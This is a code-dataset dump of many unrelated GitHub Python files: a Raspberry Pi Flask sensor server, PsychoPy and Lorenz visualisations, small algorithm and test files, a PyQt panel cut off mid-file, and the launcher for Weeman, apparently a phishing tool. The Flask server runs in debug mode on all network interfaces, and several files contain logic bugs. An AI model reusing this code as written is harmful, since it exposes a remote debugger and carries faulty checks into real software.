'''\n\n","repo_name":"zqzl97/dzdp","sub_path":"dzdp_spider1.py","file_name":"dzdp_spider1.py","file_ext":"py","file_size_in_byte":3999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35655445566","text":"import inference_script\nimport cameraThreading\nimport RPi.GPIO as GPIO\nfrom cv2 import imdecode\nfrom os import mkdir\nfrom os import path\nimport os\nfrom datetime import datetime\nfrom threading import Thread\nfrom runpy import run_module\nfrom flask_sqlalchemy import SQLAlchemy\nfrom cv2 import IMWRITE_JPEG2000_COMPRESSION_X1000, imwrite, imdecode, IMREAD_COLOR\nfrom flask import Flask, render_template, Response, request\nfrom numpy import zeros, roll, sum, frombuffer, uint8, fromstring\n\n\n#Global Flags and Initialization \nglobal capture, play, runmodelcntnode\nrunmodelcntnode = 0\ncapture = 0\nplay = 1\nsum_array = zeros(10)\nimage_model_arr = zeros(10)\ncamera_1 = cameraThreading.Camera()\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(18, GPIO.OUT)\nESP_FOLDER = os.path.join('./saved', 'esp_cam_images')\n\n\napp = Flask(__name__, template_folder='./templates', static_folder='./static')\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///data.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\nsave_path = '\\saved'\nesp_img_dir = \"static/\"\n\n\n#Database\nclass auxiliaryReadings(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n sensor_id = db.Column(db.Integer, nullable=False)\n datetime = db.Column(db.DateTime, nullable=False, default=datetime.now())\n temp_reading = db.Column(db.Integer, nullable=False)\n moisture_reading = db.Column(db.Integer, nullable=False)\n \n def __repr__(self):\n return 'Auxiliary-Sensor ID is %r taken at %r' % (self.sensor_id, self.datetime)\n\n\nclass inferenceReadings(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n camera_id = db.Column(db.Integer, nullable=False)\n datetime = db.Column(db.DateTime, nullable=False, default=datetime.now())\n fuzzy_reading = db.Column(db.Float, nullable=False)\n model_reading = db.Column(db.Float, nullable=False)\n net_reading = db.Column(db.Float, nullable=False)\n sum_reading = db.Column(db.Float, nullable=False)\n \n def __repr__(self):\n return 'Inference-Readings ID is %r taken at %r and accumulation sum is %r' % (self.camera_id, self.datetime, self.sum)\n\n\ndef gen(camera):\n global capture\n if play:\n while True:\n frame = camera.get_frame()\n if capture:\n capture = 0\n now = datetime.now()\n current_time = now.strftime(\"%d_%m_%Y_%H_%M_%S\")\n filename = '%s.jpeg' % current_time\n path = 'saved/'\n npstring = frombuffer(frame, dtype= uint8)\n img = imdecode(npstring, 1)\n imwrite(f'{path}{filename}', img)\n \n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n \n\ndef gen_model():\n global runmodelcntnode\n sum_array = zeros(10)\n if runmodelcntnode:\n while True:\n if (not runmodelcntnode):\n sum_array = [0,0,0,0,0,0,0,0,0,0]\n break\n \n #Pass method as 0\n inference_arr = list(inference_script.main(method = 0, camera=camera_1))\n print(inference_arr)\n sum_array = roll(sum_array, 1)\n sum_array[0] = inference_arr[3]\n sum1 = sum(sum_array)\n \n data_in = inferenceReadings(camera_id = inference_arr[0], fuzzy_reading=inference_arr[2], \n model_reading=inference_arr[1], net_reading=inference_arr[3], sum_reading=sum1)\n db.session.add(data_in)\n db.session.commit()\n\n #Buzzer Activation\n if sum1 >= 7.0:\n GPIO.output(18, GPIO.HIGH)\n else:\n GPIO.output(18, GPIO.LOW) \n \n\ndef run_inference(method):\n image_model_arr = zeros(10)\n inference_arr = inference_script.main(method = method, camera=0)\n \n print(inference_arr)\n #alteration\n image_model_arr = roll(image_model_arr, 1)\n image_model_arr[0] = inference_arr[1]*5\n \n sum1 = sum(image_model_arr)\n \n data_in = inferenceReadings(camera_id = method, model_reading=image_model_arr[0], net_reading=image_model_arr[0],\n fuzzy_reading=0, sum_reading=(sum1/8))\n db.session.add(data_in)\n db.session.commit()\n\n #Buzzer Activation\n if sum1 >= 7.0:\n GPIO.output(18, GPIO.HIGH)\n else:\n GPIO.output(18, GPIO.LOW) \n\ndef fetch_data_esp_ground_sensor():\n data_out_aux = request.data\n # convert bytes to string\n data_out_str = str(data_out_aux, 'UTF-8')\n data_out_str_list = data_out_str.split()\n data_out_str_list[0] = int(float(data_out_str_list[0]))\n data_out_str_list[1] = int(float(data_out_str_list[1]))\n data_out_str_list[2] = int(float(data_out_str_list[2]))\n\n data_in_aux = auxiliaryReadings(sensor_id=data_out_str_list[0], moisture_reading=data_out_str_list[1], smoke_reading=data_out_str_list[2])\n db.session.add(data_in_aux)\n db.session.commit()\n # means return 200 response code\n return ''\n\ndef save_ml_img(img, location):\n imwrite(os.path.join(esp_img_dir,\"image-sr\"+str(location)+\".jpg\"), img)\n run_inference(location)\n print(f'Image Saved from Location - {location}')\n\n#Web Routes\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/video-stream')\ndef video_stream():\n return render_template('video-stream.html')\n\n\n@app.route('/video_feed')\ndef video_feed():\n return Response(gen(camera_1), mimetype='multipart/x-mixed-replace; boundary=frame')\n\n\n@app.route('/video_feed_flags', methods=['POST', 'GET'])\ndef video_feed_flags():\n if (request.method == 'POST'):\n global capture, play\n if request.form.get('capture') == 'Capture':\n capture = 1\n\n if request.form.get('pause') == 'Pause':\n play = 0\n\n if request.form.get('play') == 'Play':\n play = 1\n\n return render_template('video-stream.html')\n\n\n@app.route('/inference_requests', methods=['POST', 'GET'])\ndef ir_tasks():\n global runmodelcntnode\n if request.method == 'POST':\n if request.form.get('run_model') == 'Run Model':\n runmodelcntnode = 1\n \n if (request.form.get('stop_model') == 'Stop Model'):\n runmodelcntnode = 0 \n\n if runmodelcntnode:\n t1 = Thread(target=gen_model)\n t1.start() \n \n my_data = inferenceReadings.query.order_by(inferenceReadings.datetime)\n return render_template('live-inference.html', my_data=my_data)\n\n\n\n@app.route(\"/inference_requests/upload-image-sr1\", methods=[\"GET\", \"POST\"])\ndef upload_1():\n received = request\n img = None\n if received.files:\n print(received.files['imageFile'])\n # convert string of image data to uint8\n file = received.files['imageFile']\n nparr = frombuffer(file.read(), uint8)\n img = imdecode(nparr, IMREAD_COLOR)\n save_ml_img(img, 1)\n print(\"ESP32 CAM SR LOC 1 Image Received\") \n \n return \"[SUCCESS] Image Received\", 201\n else:\n return \"[FAILED] Image Not Received\", 204\n \n@app.route(\"/inference_requests/upload-image-sr2\", methods=[\"GET\", \"POST\"])\ndef upload_2():\n received = request\n img = None\n if received.files:\n print(received.files['imageFile'])\n # convert string of image data to uint8\n file = received.files['imageFile']\n nparr = frombuffer(file.read(), uint8)\n img = imdecode(nparr, IMREAD_COLOR)\n save_ml_img(img, 2)\n print(\"ESP32 CAM SR LOC 2 Image Received\") \n \n return \"[SUCCESS] Image Received\", 201\n else:\n return \"[FAILED] Image Not Received\", 204\n\n@app.route(\"/inference_requests/upload-image-sr3\", methods=[\"GET\", \"POST\"])\ndef upload_3():\n received = request\n img = None\n if received.files:\n print(received.files['imageFile'])\n # convert string of image data to uint8\n file = received.files['imageFile']\n nparr = frombuffer(file.read(), uint8)\n img = imdecode(nparr, IMREAD_COLOR)\n save_ml_img(img, 3)\n print(\"ESP32 CAM SR LOC 3 Image Received\") \n \n return \"[SUCCESS] Image Received\", 201\n else:\n return \"[FAILED] Image Not Received\", 204 \n\n@app.route(\"/inference_requests/upload-image-sr4\", methods=[\"GET\", \"POST\"])\ndef upload_4():\n received = request\n img = None\n if received.files:\n print(received.files['imageFile'])\n # convert string of image data to uint8\n file = received.files['imageFile']\n nparr = frombuffer(file.read(), uint8)\n img = imdecode(nparr, IMREAD_COLOR)\n save_ml_img(img, 4)\n print(\"ESP32 CAM SR LOC 4 Image Received\") \n \n return \"[SUCCESS] Image Received\", 201\n else:\n return \"[FAILED] Image Not Received\", 204 \n\n@app.route(\"/inference_requests/upload-image-sr5\", methods=[\"GET\", \"POST\"])\ndef upload_5():\n received = request\n img = None\n if received.files:\n print(received.files['imageFile'])\n # convert string of image data to uint8\n file = received.files['imageFile']\n nparr = frombuffer(file.read(), uint8)\n img = imdecode(nparr, IMREAD_COLOR)\n save_ml_img(img, 5)\n print(\"ESP32 CAM SR LOC 5 Image Received\") \n \n return \"[SUCCESS] Image Received\", 201\n else:\n return \"[FAILED] Image Not Received\", 204 \n \n@app.route('/auxiliary-requests/post', methods=['POST', 'GET'])\ndef ar_tasks():\n if request.method == 'POST':\n if request.form.get('fetch-latest-status') == 'Fetch Latest Status':\n #fetch_data_esp_ground_sensor()\n my_data_aux = auxiliaryReadings.query.order_by(auxiliaryReadings.datetime)\n return render_template('auxiliary-sensors.html', my_data_aux=my_data_aux)\n \n \n elif request.method == 'GET':\n pass\n\n@app.route('/live-inference')\ndef live_inference():\n my_data = inferenceReadings.query.order_by(inferenceReadings.datetime)\n return render_template('live-inference.html', my_data=my_data)\n\n@app.route('/live-inference-espcam-sr1', methods=['GET', 'POST'])\ndef esp_show():\n if request.method == 'POST':\n if request.form.get('sr1') == 'View Location 1':\n full = 'static/image-sr1.jpg'\n return render_template('esp_image_show.html', user_image=full)\n if request.form.get('sr2') == 'View Location 2':\n full = 'static/image-sr2.jpg'\n return render_template('esp_image_show.html', user_image=full)\n if request.form.get('sr3') == 'View Location 3':\n full = 'static/image-sr3.jpg'\n return render_template('esp_image_show.html', user_image=full)\n my_data = inferenceReadings.query.order_by(inferenceReadings.datetime)\n return render_template('live-inference.html', my_data=my_data) \n \n\n@app.route('/view-database')\ndef view_database():\n return render_template('view-database.html')\n\n\n@app.route('/auxiliary-sensors')\ndef auxiliary_sensors():\n my_data_aux = auxiliaryReadings.query.order_by(auxiliaryReadings.datetime)\n return render_template('auxiliary-sensors.html', my_data_aux=my_data_aux)\n\n@app.route('/about-project')\ndef about_project():\n return render_template('about-project.html')\n\nif __name__ == '__main__':\n \n app.run(debug='true', host='0.0.0.0', port=8000)\n \n","repo_name":"XXGurjot07/AFL_IOT","sub_path":"flask_Serv/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20970840475","text":"import random\nimport sys\nimport math\nimport random\nimport os\nimport time\n\n\n# in * is also: from psychopy import locale_setup, sound, gui, visual, core, data, event, logging\n# visual, sound, core, data, event and logging are the crucial ones.\nimport pygame\nimport psychopy\nfrom psychopy import locale_setup, sound, gui, visual, core, data, event, logging # I guess this is the best way?\n\n# we use the Dirty Programming Method (*) to import all of psychopy's utlilities and tricks\nfrom FeedbackBase.PsychopyFeedback import PsychopyFeedback\n# we need this additional line - this is how we import psychopy -- why we need to write this multiple times?\n# \"The downside of having to write a couple import statements per module does not outweigh the potential problems\n# introduced by trying to get around writing them.\" (PEP20).\n\n\nclass NFBasicThermometer(PsychopyFeedback):\n \n # constants to be used throughout the DEFs.\n # TRIGGER VALUES FOR THE PARALLEL PORT (MARKERS)\n START_EXP, END_EXP = 252, 253\n COUNTDOWN_START = 0\n START_TRIAL_ANIMATION = 36\n\n # anything you write in INIT, in terms of variables, will/can be sent and changed...\n def init(self):\n PsychopyFeedback.init(self)\n self.caption=\"Neurofeedback Thermometer\"\n self.color=[0, 0, 0]\n self.fontheight=200\n self.NFPos=0.5\n\n # this is called BEFORE the main experiment (i.e. before 'play')\n def pre_mainloop(self):\n \n PsychopyFeedback.pre_mainloop(self)\n \n # so.. now you should have self.win, which is the window -- draw stuff on that, etc.\n # THIS ... is where we could 'draw' all kinds of stuff onto the window.\n # we COULD also, define a 'text output' window placed somewhere else, right?\n msg=visual.TextStim(self.win, text=\"Hallo!!\")\n\n # this will define all of the stuff we're going to use later on. So it's fine if this is big.\n\n self.upperThr = visual.Rect(win=self.win, name='upperThr', width=0.25, height=0.02, \\\n ori=0, pos=(0, 0.5),\\\n lineWidth=1, lineColor=[1,1,1], lineColorSpace='rgb', \\\n fillColor=[1,1,1], fillColorSpace='rgb',\\\n opacity=1, depth=0.0, interpolate=True)\n\n self.lowerThr = visual.Rect(win=self.win, name='lowerThr', width=0.25, height=0.02,\\\n ori=0, pos=(0, -0.5),\\\n lineWidth=1, lineColor=[1,1,1], lineColorSpace='rgb',\\\n fillColor=[1,1,1], fillColorSpace='rgb',\\\n opacity=1, depth=0.0, interpolate=True)\n\n self.levelBar = visual.Rect(win=self.win, name='levelBar', width=0.20, height=0.04,\\\n ori=0, pos=(0, -0),\\\n lineWidth=1, lineColor=[1,1,1], lineColorSpace='rgb',\\\n fillColor=[1,1,1], fillColorSpace='rgb',\\\n opacity=1, depth=0.0, interpolate=True)\n\n # NFPos = -0.5 # -0.25\n self.draw_nf_stimulus(self.NFPos)\n self.win.flip()\n \n # i want it to stop here so I can debug?\n #import pdb\n # pdb.set_trace()\n\n # this is called AFTER main loop...\n def post_mainloop(self):\n PsychopyFeedback.post_mainloop(self)\n\n # this always gets called, even paused.. -- UNTIL self.on_stop() is called. this will exit the main loop.\n # a 'tick' == ONE passage through the main loop (which is a 'while True' loop, basically...)\n def tick(self):\n\n # let's see if we can change the parameter within this tick\n\n countdowntimer = psychopy.clock.CountdownTimer()\n countdowntimer.add(60)\n while countdowntimer.getTime() > 0:\n self.draw_nf_stimulus(self.NFPos)\n self.win.flip()\n\n self.on_stop()\n\n # this gets called ONLY -- while on play mode\n def play_tick(self):\n pass\n \n # this gets called ONLY -- while on pause mode\n def pause_tick(self):\n pass\n \n # one could define several other tick methods for different kinds of behaviours.\n \n \n # this function WILL get called whenever I send over a 'control' event -- which is..\n # f.e. the NF data (whatever variable it is!)\n def on_control_event(self, data):\n self.logger.debug(\"on_control_event: %s\" % str(data))\n self.NFPos = data[\"data\"]\n\n # this function WILL get called whenever I do anything like 'play','pause','quit', etc.\n # and this ALSO can contain some data (for example some init data...)\n # def on_interaction_event(self, data):\n # print(data)\n # pass\n\n # make sure to do some calculation\n # expect a value between -1 and +1 -- and adjust position of the stimulus accordingly.\n # so we either have a bar or a rocket or an image floating upwards or downwards -- make sure it works.\n\n\n\n # make a separate function to draw the NF stimulus, IF REQUESTED\n def draw_nf_stimulus(self, NFPos):\n\n # the total amount of space (using normalized units in psychopy) -- not taking into account the objects\n # themselves, and being mindful of that position is relative to the CENTER of an object.\n totalspace = self.upperThr.pos[1] - self.upperThr.height / 2. \\\n - (self.lowerThr.pos[1] + self.lowerThr.height / 2.) \\\n - self.levelBar.height\n\n\n if NFPos > 1 or NFPos < 1:\n Exception('error: NFPos should be between or equal to -1 and +1!')\n\n # calculate.. -- NFPos should be -1<=X<=1 --> THEN -- at what fraction of the totalspace should stim be?\n frac = (NFPos + 1.0) / 2.0 # this makes it between 0 and 1.\n\n # then - set levelBar to a new position == frac * totalspace + half of size of the bar...\n # because the height of an object is relative to the MIDDLE of that object...\n newypos = frac * totalspace + self.lowerThr.pos[1] + self.lowerThr.height/2.0 + self.levelBar.height/2.0\n\n self.levelBar.setPos((self.levelBar.pos[0], newypos))\n\n self.upperThr.draw()\n self.lowerThr.draw()\n self.levelBar.draw()\n","repo_name":"jnvandermeer/nf-stim-preview","sub_path":"src/Feedbacks/NFBasicThermometer/NFBasicThermometer.py","file_name":"NFBasicThermometer.py","file_ext":"py","file_size_in_byte":6213,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"40010983274","text":"from time import time\n\ndef gen(s):\n for i in s:\n yield i\n\nn = gen('kate')\n\n\ndef get_filename():\n i = 1\n while True:\n pattern = \"file-{}.jpeg\"\n t = int(time() * 1000)\n\n yield i\n yield pattern.format(str(t))\n\n i += 1\n\ndef gen(s):\n for i in s:\n yield i\n\ndef gen2(n):\n for i in range(n):\n yield i\n\ng1 = gen(\"kate\")\ng2 = gen2(4)\n\ntasks = [g1, g2]\n\nwhile tasks:\n task = tasks.pop(0)\n try:\n i = next(task)\n print(i)\n tasks.append(task)\n except StopIteration:\n pass\n","repo_name":"katerina-f/asynchronus_python","sub_path":"3_generators.py","file_name":"3_generators.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24546469174","text":"import sys\nimport argparse\n\nSUPPORTED_PYTHON_VERSIONS = [\"2.7\", \"3\"]\n\nclass Weeman:\n def __init__(self):\n self.parse_arguments()\n self.tests_pyver()\n self.tests_platform()\n \n def parse_arguments(self):\n parser = argparse.ArgumentParser(description=\"Weeman Tool\")\n parser.add_argument(\"-q\", \"--quiet\", dest=\"quiet_mode\", action=\"store_true\", help=\"Run without displaying the banner.\")\n parser.add_argument(\"-p\", \"--profile\", dest=\"profile\", help=\"Load Weeman profile.\")\n self.args = parser.parse_args()\n \n def tests_pyver(self):\n if sys.version[:3] not in SUPPORTED_PYTHON_VERSIONS:\n print(\"Weeman does not support your Python version.\")\n sys.exit(1)\n \n def tests_platform(self):\n supported_platforms = [\"linux\", \"darwin\"]\n if any(platform in sys.platform for platform in supported_platforms):\n if \"win\" in sys.platform:\n print(\"Sorry, there is no support for Windows right now.\")\n sys.exit(1)\n else:\n print(\"Weeman might not work optimally on your platform (%s).\" % sys.platform)\n \n def run(self):\n if self.args.profile:\n from core.shell import shell_noint\n shell_noint(self.args.profile)\n else:\n from core.shell import shell\n shell()\n\nif __name__ == '__main__':\n weeman_tool = Weeman()\n weeman_tool.run()","repo_name":"avinashkranjan/Pentesting-and-Hacking-Scripts","sub_path":"Weeman/weeman.py","file_name":"weeman.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":154,"dataset":"github-code","pt":"52"} +{"seq_id":"27162039480","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\nc = 343\nfrequencies = [700, 1400, 2800, 5600]\nincoming_angles = np.linspace(0, 2*np.pi, 1000)\nX = np.array([ # estimated positions of the microphones\n [0, 0],\n [0, 0.045],\n [0.039, 0.023],\n [0.039, -0.023],\n [0, -0.045],\n [-0.039, -0.023],\n [-0.039, 0.023],\n])\ntarget_dir = np.array([1, 0])\n\ndef W(k, target_k):\n weights = (1/len(X))*np.exp(1j*X@target_k)\n # window_factor = 1/6 # based on the geometry, all axially-symmetric windows reduce to a single factor (1/6 is rectangular)\n # weights[0] *= len(X)*window_factor # assuming that the first microphone is the center microphone...\n # weights[1:] *= len(X)*(1-window_factor)/6 # cancel out the previous factor of (1/len(X)) then set new factors\n return weights.dot(np.exp(-1j*X@k))\n\nincoming_w_over_freq = []\nfor freq in frequencies:\n target_k = (2*np.pi*freq/c)*target_dir\n incoming_k = [np.array([np.cos(theta), np.sin(theta)])*(2*np.pi*freq)/c for theta in incoming_angles]\n incoming_w = np.array([W(k, target_k) for k in incoming_k])\n incoming_w_over_freq.append(incoming_w)\n\nplt.figure(1)\nfor freq, incoming_w in zip(frequencies, incoming_w_over_freq):\n plt.polar(incoming_angles, 20*np.log10(np.abs(incoming_w)), label=f'{freq} Hz')\nplt.ylim([-24, 0])\nplt.legend()\nplt.title('UMA-8 Theoretical Array Pattern over Frequency')\n\nplt.show()","repo_name":"yashjitendragupta/EE434-Project","sub_path":"old_kenny_experiments/uma8_theoretical_patterns/uma8_theoretical_patterns.py","file_name":"uma8_theoretical_patterns.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"42602292559","text":"def is_safe(board, row, col):\n # Check the current row\n for i in range(col):\n if board[row][i] == 1:\n return False\n \n # Check the upper left diagonal\n i = row\n j = col\n while i >= 0 and j >= 0:\n if board[i][j] == 1:\n return False\n i -= 1\n j -= 1\n \n # Check the lower left diagonal\n i = row\n j = col\n while i < 8 and j >= 0:\n if board[i][j] == 1:\n return False\n i += 1\n j -= 1\n \n return True\n\n\ndef solve_eight_queens():\n board = [[0] * 8 for _ in range(8)]\n\n if not solve_util(board, 0):\n print(\"No solution found.\")\n return False\n\n print_board(board)\n return True\n\n\ndef solve_util(board, col):\n if col >= 8:\n return True\n\n for row in range(8):\n if is_safe(board, row, col):\n board[row][col] = 1\n\n if solve_util(board, col + 1):\n return True\n\n board[row][col] = 0\n\n return False\n\n\ndef print_board(board):\n for row in range(8):\n for col in range(8):\n print(board[row][col], end=\" \")\n print()\n\n \n# Run the function to solve the problem\nsolve_eight_queens()\n","repo_name":"IanVazquez/TC2037.601","sub_path":"Reto/queens.py","file_name":"queens.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13206257608","text":"from ..interfaces.database import DatabaseInterface\nfrom ..interfaces.text import TextInterface\nfrom savanamed.db import get_db\n\nimport pymongo\n\n\nclass MongoDatabaseAdapter(DatabaseInterface):\n \"\"\"\n This is a connector between the database and PatientReport\n \"\"\"\n\n @staticmethod\n def has_been_saved(text: TextInterface) -> bool:\n \"\"\"\n Checks that the given text has been saved. The text\n must be anonymous\n \"\"\"\n digest_code = text.digest_code\n\n return bool(MongoDatabaseAdapter.retrieve_document(digest_code))\n\n @staticmethod\n def save_document(text: TextInterface) -> None:\n \"\"\"\n Saves the given document.\n \"\"\"\n db = get_db()\n digest_code = text.digest_code\n patient_id = text.original_id\n free_text = text.data\n\n document = {\n 'digest_code': digest_code,\n 'patient_id': patient_id,\n 'free_text': free_text,\n }\n\n db.patient_documents.insert_one(document)\n\n @staticmethod\n def save_if_not_has_been_saved(text: TextInterface) -> bool:\n \"\"\"\n Saves the given document if it has not been saved\n \"\"\"\n has_text_been_saved = MongoDatabaseAdapter.has_been_saved(text)\n if not has_text_been_saved:\n MongoDatabaseAdapter.save_document(text)\n return not has_text_been_saved\n\n @staticmethod\n def retrieve_document(document_digest: str) -> pymongo.collection.Cursor:\n \"\"\"\n Returns the document that contains a given digest\n \"\"\"\n db = get_db()\n search_params = {\n 'digest_code': document_digest,\n }\n\n return db.patient_documents.find_one(search_params)\n","repo_name":"gowikel/savanamed","sub_path":"savanamed/pdf2text/adapters/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73764183845","text":"import cv2\nfrom cvzone.HandTrackingModule import HandDetector\nimport math\nimport numpy as np\nimport os\n\ncap = cv2.VideoCapture(0)\ndetector = HandDetector(maxHands=1)\n\nfolder = \"./images/eight\"\n\noffset =20\nimgSize = 300\ncounter = 0\n\nwhile True:\n success, img = cap.read()\n hands, img = detector.findHands(img)\n\n if hands:\n hand = hands[0]\n x, y, w, h = hand['bbox']\n img_white = np.ones((imgSize, imgSize, 3), np.uint8) * 255\n\n imgCrop = img[y - offset:y + h + offset, x - offset:x + w + offset]\n aspectRatio = h / w\n\n if aspectRatio > 1:\n k = imgSize / h\n wCal = math.ceil(k * w)\n resized_img = cv2.resize(imgCrop, (wCal, imgSize))\n\n w_offset = math.ceil((imgSize - wCal) / 2)\n img_white[:, w_offset:wCal + w_offset] = resized_img\n else:\n k = imgSize/w\n hCal = math.ceil(k*h)\n resized_img = cv2.resize(imgCrop, (imgSize, hCal))\n h_offset = math.ceil((imgSize - hCal) / 2)\n img_white[h_offset:hCal+h_offset, :] = resized_img\n\n cv2.imshow(\"img_white\", img_white)\n\n cv2.imshow(\"image\", img)\n key = cv2.waitKey(1)\n if key == ord(\"s\"):\n counter += 1\n cv2.imwrite(os.path.join(folder, f'{counter}.jpg'), img_white)\n print(counter)\n\n","repo_name":"Enzo-MiMan/cv_related_collections","sub_path":"projects/hand_gesture_detection/data_collection.py","file_name":"data_collection.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"52"} +{"seq_id":"12333896080","text":"import numpy as np\nfrom scipy.integrate import odeint\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\n\n# Lorenz system parameters\nrho = 28.0\nsigma = 10.0\nbeta = 8.0 / 3.0\n\n# Lorenz system equations\ndef lorenz_system(current_state, t):\n x, y, z = current_state\n dxdt = sigma * (y - x)\n dydt = x * (rho - z) - y\n dzdt = x * y - beta * z\n return [dxdt, dydt, dzdt]\n\n# Initial state and time points\ninitial_state = [1.0, 1.0, 1.0]\ntime_points = np.linspace(0, 50, 10000)\n\n# Solve differential equations\nsolution = odeint(lorenz_system, initial_state, time_points)\n\n# Extract solutions\nx, y, z = solution.T\n\n# Set up figure for animation\nfig, ax = plt.subplots()\nax.axis('off') # Turn off the axes\n\n# Set the face and edge color to black\nfig.patch.set_facecolor('black')\nax.set_facecolor('black')\n\n# Set up the line, make it gold-colored and very thin\nline, = ax.plot(x, z, lw=0.5, color='#FFD700') # Gold color in hex\n\n# Set up the point, which is a dot on the graph that will 'walk' along the line\npoint, = ax.plot([], [], 'o', color='#FFD700', markersize=1) # Gold color to match the line\n\n# Set the axis limits\nax.set_xlim(min(x), max(x))\nax.set_ylim(min(z), max(z))\n\n# Animation function\ndef update(frame):\n point.set_data(x[frame], z[frame])\n return point,\n\n# Create animation\nani = FuncAnimation(fig, update, frames=len(time_points), interval=10, blit=True)\n\n# Save animation with increased fps for faster playback\nani.save('lorenz_attractor_xz_plane_with_point.gif', writer='pillow', fps=240)\n\nplt.close()\n","repo_name":"raresrares/raresrares.github.io","sub_path":"lorenz_attractor/lorenz_attractor_with_point.py","file_name":"lorenz_attractor_with_point.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17767878906","text":"\"\"\"\r\ndata science app\r\n\"\"\"\r\nimport streamlit as st\r\nimport pandas as pd\r\nst.title(\"my data app\")\r\nst.write(\"\"\" upload csv file \"\"\")\r\nuploaded_file = st.file_uploader(\"Choose a file\")\r\nif uploaded_file is not None:\r\n # Can be used wherever a \"file-like\" object is accepted:\r\n df1 = pd.read_csv(uploaded_file)\r\ndef check_box():\r\n \"\"\"\r\n check box function\r\n \"\"\"\r\n if st.checkbox('describe the data'):\r\n st.subheader('desscribe values')\r\n st.write(df1.describe())\r\n if st.checkbox('show raw data'):\r\n st.subheader('raw data')\r\n st.write(df1)\r\n st.write(\"check the colomn to be deleted\")\r\n st.write(\"columns in the data\")\r\n for column in df1.columns:\r\n st.checkbox(column)\r\n for column in df1.columns:\r\n st.line_chart(df1[column])\r\ndef delete_column():\r\n \"\"\"\r\n delete column function\r\n \"\"\"\r\n text_input1=st.text_input(\"do you want to delete columns\")\r\n if(text_input1 == \"yes\"):\r\n if(isinstance(text_input1,str)):\r\n df1.drop(columns=[st.text_input(\"enter the column to be deleted\")],axis=1,inplace=True)\r\n st.write(\"column is deleted\")\r\n st.dataframe(df1)\r\n else:\r\n st.write(\"column not found\")\r\nif __name__ ==\"__main__\":\r\n check_box()\r\n delete_column()\r\n","repo_name":"saiteja979/myproject","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20040398978","text":"from datasette_jellyfish import prepare_connection\nimport sqlite3\nimport pytest\n\n\n@pytest.mark.parametrize(\n \"sql,expected\",\n (\n ('soundex(\"hello\")', \"H400\"),\n ('metaphone(\"hello\")', \"HL\"),\n ('nysiis(\"hello\")', \"HAL\"),\n ('match_rating_codex(\"hello\")', \"HL\"),\n ('levenshtein_distance(\"hello\", \"hello world\")', 6),\n ('damerau_levenshtein_distance(\"hello\", \"hello world\")', 6),\n ('hamming_distance(\"hello\", \"hello world\")', 6),\n ('jaro_similarity(\"hello\", \"hello world\")', pytest.approx(0.8181818181818182)),\n (\n 'jaro_winkler_similarity(\"hello\", \"hello world\")',\n pytest.approx(0.890909090909091),\n ),\n ('match_rating_comparison(\"hello\", \"helloo\")', 1),\n ),\n)\ndef test_jellyfish(sql, expected):\n conn = sqlite3.connect(\":memory:\")\n prepare_connection(conn)\n result = conn.execute(\"select \" + sql).fetchone()[0]\n assert expected == result\n","repo_name":"simonw/datasette-jellyfish","sub_path":"tests/test_jellyfish.py","file_name":"test_jellyfish.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"52"} +{"seq_id":"69967335524","text":"## This is the main ScARA Panel application. Execute this to run the application\n## This includes the UI and handling of commands from the Server\n## Written by Hannah A. Patellis - hannahap.com - @hannahpatellis\n\nimport sys\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import (QWidget, QApplication, QMainWindow)\nfrom PyQt5.QtCore import QProcess\nimport os\nfrom threading import Timer\nimport time\nimport json\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\nclass Ui_MainWindow(QMainWindow):\n\n global scenes\n global clients\n global currentRoom\n global currentSceneList\n currentSceneList = dict()\n\n def __init__(self):\n QMainWindow.__init__(self)\n\n self.setupUi(self)\n\n ## Establish user interface\n def setupUi(self, MainWindow):\n ## Initial setup\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(480, 320)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth())\n MainWindow.setSizePolicy(sizePolicy)\n self.setWindowFlags(QtCore.Qt.FramelessWindowHint)\n font = QtGui.QFont()\n font.setFamily(\"Helvetica Neue LT Com,HelveticaNeueLT Com 45 Lt\")\n 